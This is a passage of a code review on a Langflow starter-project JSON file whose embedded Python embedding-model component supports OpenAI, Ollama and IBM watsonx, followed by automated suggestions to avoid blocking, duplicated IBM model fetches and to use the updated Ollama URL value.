= False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" | ||
| }, |
There was a problem hiding this comment.
🛠️ Refactor suggestion | 🟠 Major
Avoid blocking calls and duplicate fetches when listing IBM models.
fetch_ibm_models uses synchronous requests inside async update_build_config and is invoked twice for the same value. Offload to a thread and fetch once to prevent event‑loop stalls and redundant I/O.
Apply this minimal change inside the EmbeddingModelComponent code block:
+import asyncio
@@
- elif field_value == "IBM watsonx.ai":
- build_config["model"]["options"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)
- build_config["model"]["value"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]
+ elif field_value == "IBM watsonx.ai":
+ models = await asyncio.to_thread(self.fetch_ibm_models, base_url=self.base_url_ibm_watsonx)
+ build_config["model"]["options"] = models
+ build_config["model"]["value"] = (models[0] if models else "")
@@
- elif field_name == "base_url_ibm_watsonx":
- build_config["model"]["options"] = self.fetch_ibm_models(base_url=field_value)
- build_config["model"]["value"] = self.fetch_ibm_models(base_url=field_value)[0]
+ elif field_name == "base_url_ibm_watsonx":
+ models = await asyncio.to_thread(self.fetch_ibm_models, base_url=field_value)
+ build_config["model"]["options"] = models
+ build_config["model"]["value"] = (models[0] if models else "")Committable suggestion skipped: line range outside the PR's diff.
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, fetch_ibm_models is synchronous and called twice in
update_build_config causing event-loop blocking and duplicate I/O; change
update_build_config to offload the synchronous fetch to a thread via
asyncio.to_thread (or asyncio.get_running_loop().run_in_executor) and call it
only once per branch, e.g. await asyncio.to_thread(self.fetch_ibm_models,
base_url=value) store the returned list in a variable, then set
build_config["model"]["options"] = models and build_config["model"]["value"] =
models[0] if models else "" instead of calling fetch_ibm_models twice; add an
import for asyncio at top if missing.
Fix: use the updated value in Ollama base URL refresh.
The ollama_base_url handler ignores field_value, risking stale model lists.
Apply:
- elif field_name == "ollama_base_url":
+ elif field_name == "ollama_base_url":
@@
- ollama_url = self.ollama_base_url
+ ollama_url = field_value or self.ollama_base_url📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" | |
| }, | |
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = field_value or self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" |
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, the ollama_base_url handler ignores the incoming
field_value and always uses self.ollama_base_url, which can cause stale model
lists; change the handler to use a local variable (e.g., ollama_url =
field_value or self.ollama_base_url) and then pass that variable to
is_valid_ollama_url and get_ollama_models so updates use the new value when
provided while still falling back to the instance attribute if field_value is
empty.
| "input_text": { | ||
| "_input_type": "BoolInput", | ||
| "advanced": true, | ||
| "display_name": "Include the original text in the output", | ||
| "dynamic": false, | ||
| "info": "", | ||
| "list": false, | ||
| "list_add_label": "Add More", | ||
| "name": "input_text", | ||
| "placeholder": "", | ||
